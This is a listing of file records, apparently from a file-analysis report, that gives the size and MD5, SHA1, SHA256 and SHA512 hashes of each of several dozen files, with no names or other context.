SHA5125c9656af97dafaaa29e415b39ee679ab3ac6c746b29ee79ac50a662b0c07003731d18a7e3fbc5941942ebda195e768a99c38116f75bbaa17fe6d2dba7ff33d97
-
Filesize
4.4MB
MD526e9e46ba2e6aefc117b3e14e0c7151e
SHA120e7e1cc9e56af83795b78e0d2abd5d106b10156
SHA2569c40b89a50ecaa4fa1276399b73e2665e8039f75156d983a1708e633cd695490
SHA5126804f68232a3bb5d3a7659e0a9a08863a4a46306a09126ce45eba6e1d204edd9a9b52c51ee0b7e1385c41e89de356f3ca157d544dfcee9482b5fcb0642a3bb5f
-
Filesize
666KB
MD573925f6c7ef9b6e4c8e01078b7faf630
SHA1f2e5f7d67f9900f392ea94d5692d72fb8a8053c4
SHA256dbc157d84e8f33be5c6ca357f1f982ace27bbe2cc3f2132d8dfc824d1b6a6122
SHA512c4a117aed10c84635f07848f4a0396be7bb1b56c62e960484cb13716b36328c486184c0ca71efe66a45596abfac48ce063c87475f9779fe56b5bdd883c63254f
-
Filesize
10.7MB
MD5602f4ed023f4a4f56bb55da774590eb9
SHA1ad1a87355af9a8452cb9713aa3fe2948b17fcecd
SHA256a5c1e5a5b54192780c7dc83f766e007e019c5b441a047380b96dc0e046cc90d1
SHA5123a846fead84f8366c6405455162a0651759a57a86b7c68fcfaa8ce1c5f36c057e31e9e8d4349842e657532b8e55f2b9ee3a3f0126a629c4c69a0979ec9a804e9
-
Filesize
8.6MB
MD554b50c38ac45486a670665d9bad76d0c
SHA1f91a7a1599f1eb2367836fcb0d90fa1117ddf738
SHA256d51551fcbd5c981bd107c6788d785a0e66655b2e652780524cb24b526c8cf95b
SHA512e91579d6b3f6ff8f6e82bb064277f7200306c6b768f3abc876106420dbced808da22403446df252d438c2a451f59d532fafd797bdd477b49c21bdfd52d39c2bf
-
Filesize
716KB
MD557a5e092cf652a8d2579752b0b683f9a
SHA16aad447f87ab12c73411dec5f34149034c3027fc
SHA25629054ff2ce08e589dcc28d1e831f0c99659148f1faaabc81913207c4d12b4a34
SHA5125759fc4bf73a54899fb060df243cdd1c1629504b20695d7116317a1941ef1f86449c9c3388d5a48bc7e4223207c985eadba1950e15c045d15890423701ba1b1f
-
Filesize
358KB
MD5e604fe68e20a0540ee70bb4bd2d897d0
SHA100a4d755d8028dbe2867789898b1736f0b17b31c
SHA2566262dac7e6839a9300b48f50d6d87011fc3e9baae5bbcec14ba00b7a6da6f361
SHA512996216993cc5e07e73d6b3c6485263537377c6b5af94a8b681216e7c5f8383672408998d4186a73f5fe83d94f48bf0a54d6a7c2ca82d3aa825ade2462db0bd89
-
Filesize
1.4MB
MD5f3f9535109155498021e63c23197285f
SHA1cf2198f27d4d8d4857a668fa174d4753e2aa1dca
SHA2561ec54b5a3d71165f456a6e441bd7d6d85500973f953b9d6388c1c24a35cc449f
SHA512a05607b2d128055117877682f05b5abf1777addcb79debdac812cbc78cbef56ca87abca463b6fa96679172f580fd1603e7e470b7484248a3cdde0c0bc3124755
-
Filesize
730KB
MD531aeed8d880e1c68a97f0d8739a5df8a
SHA1d6f140d63956bc260639ab3c80f12a0e9b010ee9
SHA256bc7e489815352f360b6f0c0064e1d305db9150976c4861b19b614be0a5115f97
SHA512bacbe9af92bf8f2adb7997d6db2f8a8fe833dbcef5af0cc465f6e41c2f409019b740c82f4b587d60ce1446f9cf10ebcb638bdf8d5fe05c7e8e8c518b747b6748
-
Filesize
1.8MB
MD560177b79b67b09b0b1ac0aabbd400f8e
SHA10c2cebc1d71cbac1a733620b2ba92bd582ed84f8
SHA2565fbcfaf0b8ec644deccb00e184558ab53e85c798e59e03d67429a2cdbd4494d5
SHA5124c15a04eeaf9df3765bd0d88bf09c60e3925d00820aaec0ac66eabb105c58c9f7cda8e7113cd836a9188fc363af8cc57faea5ac5da1587eaf62eee7ed82c4356
-
Filesize
1.2MB
MD5bf6f64455cb1039947a3100e62f96a52
SHA128cdd5c2e82d4ad078420dcbf4b32b928861fcb6
SHA256c81ece0b60ed50db7d3769388f34ba051a05c95bd026e78dabb6ce08ff91bbba
SHA512c2ceb000b387710cf388e6699a2cb4465380bf5798d9f37c238db0701aaea6ccad1f44e6b9e45398050202ef875a5d7679890df2bb65538a0c8a9655c62c185b
-
Filesize
2.1MB
MD5e342c87b088f54fb0048150dba45413a
SHA19618ee6d3ff58e393afbccff6a0d2bd390afdad6
SHA256bc7de65f926cc6416d0878895b53a4e73512ce9801edf4eb792de0ae1af5e77a
SHA51244372cd6099a27eda4b05512f6d5afea7b22502158d86e86832b7bd3cdcf02766c60e395f2df33382e1631d842071b7fed93e1f55725a379f8630b4c3ca3a975
-
Filesize
1.1MB
MD55adca22ead4505f76b50a154b584df03
SHA18c7325df64b83926d145f3d36900b415b8c0fa65
SHA256aa7105a237dc64c8eb179f18d54641e5d7b9ab7da7bf71709a0d773f20154778
SHA5126192d61e777c59aa80c236b2f3e961795b7ff9971327c4e3270803d356ecf38949811df680a372259a9638ccdb90fc1271fb844f1f35656d5b317c96081f396e
-
Filesize
250KB
MD57498e75d852bd5d52581a27717e2170a
SHA1cd74cc40862ca565d147f7568dc3eea8443660f0
SHA25611b8510f3b9ee2584adbe0120d4f753c67b804143a874585201d1855f0e97001
SHA512cc1514775c51110d3748aad6b8c38db4b3bbe864c9329f47020115de5ebc98c1dceb8ec0eb9c27b375a5308e29cab8db587771602a85f99e066bb13b2222f214
-
Filesize
717B
MD5aff3e0d16e03ae625117fc70aab7bd8b
SHA153c9694ccb231f3e16bd92db0f19081acde74db9
SHA256eb53628ddbffb86090d72805e4f2120bbcfe44da0366bc51fc748ce357243b17
SHA512b74c50632b2ae732929a4751b34e5083c541faeffa9cf3fdd9ea3931179901187f8f921e2d46a2d95028aa1a62d1280733d47397f39bf3a613d1700f39396272
-
Filesize
40KB
MD5ab893875d697a3145af5eed5309bee26
SHA1c90116149196cbf74ffb453ecb3b12945372ebfa
SHA25602b1c2234680617802901a77eae606ad02e4ddb4282ccbc60061eac5b2d90bba
SHA5126b65c0a1956ce18df2d271205f53274d2905c803d059a0801bf8331ccaa28a1d4842d3585dd9c2b01502a4be6664bde2e965b15fcfec981e85eed37c595cd6bc
-
Filesize
1KB
MD581c72686ee01fe0a5f859cb98af4db1f
SHA17df43e567f73a3262e457d23d2602dc521aedeca
SHA256d86bab22a2293ead82b374efba9df16d868fe10fda0bfad19eef103f303f4289
SHA51245e5be603e977094da71efc3b0564169ac7252425ecb24f2873ae13b70876ac0fd499a36962886f2da9f37390aac9d97b4862a5536894395ec152d4a0dde46c5
-
Filesize
1KB
MD50185cf8b464a156730b424cf63478a52
SHA11f851fdc2162da89f113ef38e31443c672321e8b
SHA256dd46c7fecae5fb4f460c519fc701d2686b631debcebdd978105529d3166f14c1
SHA5122fde8127d3d9c65befeec1dd4b06bb0bfd08787a2f904043433d3e99a8f0d31424f13b51f384b8cca4f52c352b0bcccc6afcf326e80d211793c993a7911ad1ff
-
Filesize
1KB
MD5ed841c8ba907617a400c1cfc62c8e397
SHA1d04cc4eadd11bfed3c1910b8853dbd82a958edf0
SHA256197df2ee5362498d6766f0f539afb3bec3855b054c1b29e6fc5bbb1090330cc2
SHA512ea119b8aa557b8774bc635aa47f8c518a0195d89b420a4089489ccf9a29ea1f0d11229c03b4f798030f75632d5eb371c9b6d42dca7361be246fe06b64e9b72c5
-
Filesize
1KB
MD5c98a0c78316c3ae8b39632dd7d22f9da
SHA1ea7598a584b1c494c2849a46a2dbce4b0b1bdd01
SHA256d05fd432a524d2b735d941a19bbaa792a786c6cbaee10fd803528585471e3668
SHA512f78689843f20b289cd6e17a81a0c6250ea87b93326bcfb2dc7101b78e3a8940528ae163bcc7eddd469272cb654e7902448e646d2064b1600a98aee9ad7545956
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
8KB
MD5fd110ce458c73d45668cdad453286405
SHA1b9afe2b9c4ca711da5876c4b09e080e511d7fa3d
SHA256e6e1795a4a7a64dab4576403d286762c86c2e95671de0ae66432fd5c5571b05b
SHA512b0bcc5e8d1a69e7584a491ee4e2515790ee918a69be7428703302800ff2b15465720f16782ad733c0ca6c5d95651f1278f5b2ce7c2abaccdc7b9801eb5f7a6e3
-
Filesize
8KB
MD54ccdbb2a33f1c3d8cfdd585033d29738
SHA191f13d86d5f3d6728edd726b45de714da249b628
SHA25642e472b4004f640582e68c36dba147657fec66ca3e4346ff0c22aaf730dae2ac
SHA512f976e3251ce82e2dbc3bc85944a9a670d1480aef3076c973d85b5d2d2b7f6c17cbf95ab0e20d765b96c68161403861fb971c384d3d1d8243e079c9a54168246f
-
Filesize
8KB
MD503a2224125696eddd6493754bd6901fd
SHA15682008d00bbc0ea74d7042100d7d9c554bb842b
SHA256d5a5031ea133696643db0dd05ab55aea9e794c07a6bdaa73c96ab2d65f54a99a
SHA51216a1b8177b8885b45924c081044fe95375db18b2b5fa814b662a6899a75be5564189888428ee7ecf28e3360c6438f297293dcb7053f3e2a07324abd714624f47
-
Filesize
2.6MB
MD53fb0ad61548021bea60cdb1e1145ed2c
SHA1c9b1b765249bfd76573546e92287245127a06e47
SHA2565d1a788260891c317f9d05b3387e732af908959c5ad4f5a84e7984bee71084f1
SHA51238269c22fda1fdee5906c2bfdfc19b77b5f6d8da2be939c6d8259b536912f8bc6f261f5c508f47ade8ab591a54aafbfbcc302219820bad19feb78fcc3586d331
-
Filesize
204B
MD50332e3632d669829a31d08b360cf7b44
SHA1756b89a3e242d2bd42f3dd568876d265a96b4f98
SHA256b2272d0a0894d2b53404d6491efde279ecbc22b1f3d9177a650257d6c82950c8
SHA5123c525efc305e1150f2d8aa9ba9e37dfa540085c3ad63161e3a46dbe7492b91ac92fc98230eec8cb7452ce5f230c389924b5f5934e1a87ae2b4cb8db5e37505dc
-
Filesize
652B
MD5de1034e0e1317ee6da37fdd8059957c0
SHA192eed748ca49c6c1785b4a1f6cbe10e291d93272
SHA25613fe39479364ae39bb16d9c61c544595dcd9de63e15ace331118834a9926cb4e
SHA512bacb8485fb8976f8ca7d5b7e9d417ce033de2de1f87844104ff68f1450e699d8d1a0a2251b8b19f8a0e494e346f4d6f8139bb9103a38f03772f7521fb3610586
-
Filesize
652B
MD5a520cd72a52d005d2b031a1ec41773ca
SHA1358476cbd40b6c4630c11f73732f6a253e291275
SHA2567979ed32af5ff443abe5c56324b7f4389a5947962a1b5cd768a08eb5141f1bff
SHA5124168199600f85b995f8116d84df6e4d49c92399c9a2f630feebd43f5350e2feb1b5532e86191e55848e97d50a1d0b6dbd16b3a38a89c72791d4b3e6378b7fe06
-
Filesize
204B
MD53d55a58425b1cef4df9d7927c5a581a7
SHA12b9a9f723935ffbf3b32d6ceaa4e57081d918318
SHA2560e5280bbc6d16a2b5edf6e978326060498426daa8e651df55e5c91f5ac055d31
SHA512aa82d3b6dfd6353ab48be0dfc1d206a74a248d7e5db83b4962bb852bae49858e68e1f7bcd6cfb15276ee5dee51c92b4962282325497d928fda875b219d2c8fc6
-
Filesize
652B
MD5f741f10f2375dd7133df0c25fbe51778
SHA1aa7523e54dcc4783d00d0ac6a52bb31eb093c5e8
SHA2569540de361269a30e143afca33c3acbea6cac0e1eca5c58888c249057bf61b829
SHA512e22a0d1e7d79370a977fdecae52a9d8a6a836c7249c462f9f36c68c8315d7fe652a11ff973fe324da8414f60fb9c2f2d953a084abba657e2b81651acff8ca2d0
-
Filesize
204B
MD5b18146f45b9e609e61209e3b134cd427
SHA189a9bc2a720e47a510aacefe6639a06a35b6df2b
SHA2560c26ab5a2d51ca766bdcab45de8b44b6f7fff6955ca0d91662652ea427641008
SHA5124cff35ce23f6f4f208f7179b5fb1e1aaaa586ec88df8d616cff30ab6765df7c05c929f03b7e86a5d1cb69da1a6fe1d271a5ae273ac0e52570a7a0b10158fb2af
-
Filesize
652B
MD552625be21d12fad2a456705c41d8e14f
SHA188bf6fedd06fba2e4d8e79c03ebfe81a6099b2c9
SHA256bd5e924b228db227e3300160537c3430cb8facb88c4b6533d96b67e567fa4820
SHA512ecca0a6f2e7bb0dcd1154128e497a12aeb23968ba8876ab6d5d3808daad988a1f86bdbe25795afc153f4df7b89d8a0b542af1db9058c12a3bef92cc74fa5bb87
-
Filesize
8KB
MD558b10ef6ba0da88788f1aac56ce7e2db
SHA148221936b98aac14ead7c4589513d074365414ec
SHA256ae11144f426028e50e77d64a66aeb954e169f627f8abfe403791032594834520
SHA51219c28b5af8e4243350ee13c423fd066cef969a5c86de5f7b2ac4e4fbf75fda17e82a6a91fbd6034786b9beee77e2eb4b1cecd1cf0b901e2874b88da3e338845e
-
Filesize
204B
MD5460e2325977eab1174a9679fa1ad8e45
SHA1748ddc40234481e8c0b7722719d6073003f6f662
SHA256befd4ef920870c59b4c9ca261df655ccc41a9da60f99287d883e51cb27a96262
SHA512176a807ddab1d66f58e0ef25daf481b1b67aeb8320050bf0b5430fef46338eaea43b5683560a532728440a956a03b876ada7410bb3f177bd02607699c8cdcd20